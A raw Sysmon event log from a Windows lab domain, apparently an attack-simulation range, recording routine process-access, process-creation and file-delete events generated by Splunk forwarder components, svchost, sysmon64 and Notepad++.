10341000x8000000000000000807439Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:27.706{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807438Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.706{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807437Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:27.690{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807436Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.690{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807435Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.690{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F47F-60EB-7179-00000000D001}3416C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807434Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.690{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F47F-60EB-7179-00000000D001}3416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807433Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.691{0C1E0330-F47F-60EB-7179-00000000D001}3416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807432Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.409{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E647291EB62488CD894B059771422AC8,SHA256=41421338CCF599D1D3574C1BDC77C29E45788455C9E3E21BF8D484D1739F6843,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048244Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:27.112{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2A071330FBE8E101579BE89A3610223,SHA256=E888332A604587237ABB0D8D991B278B4DCEA0CD1D3EE6FC77700E0F41A1FD1F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807431Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.175{0C1E0330-F47F-60EB-7079-00000000D001}1592900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807430Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.018{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F47F-60EB-7079-00000000D001}1592C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807429Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.018{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807428Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:27.018{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807427Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.018{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807426Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:27.018{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807425Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.018{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807424Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:27.018{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807423Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.018{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807422Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:27.018{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807421Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.018{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807420Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.018{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F47F-60EB-7079-00000000D001}1592C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807419Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.018{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F47F-60EB-7079-00000000D001}1592C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807418Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.003{0C1E0330-F47F-60EB-7079-00000000D001}1592C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807461Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:28.659{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=163DA09201EF03A5C9E0B9E3316BA52D,SHA256=B1426AC95EB753E61F2845E04CE45539EE56B2CD35B5C3123095779A8DCF76AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048246Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:28.343{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_074929MD5=8E272919C7DFD9F0FF58586B847AA7EC,SHA256=DE41169BDC49860D550CF89272FF6164FCD0ED618A897CAFED6A40E0539731BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048245Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:28.127{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=408644498C6A540B3573D3EBE9F872C1,SHA256=2977DC0471F5F95F681FF5CAFE02D2A8F849B9DD48E5F530CB5A8843CC0ECA2C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807460Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:28.409{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F480-60EB-7279-00000000D001}3604C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807459Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:28.393{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807458Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:28.393{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807457Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 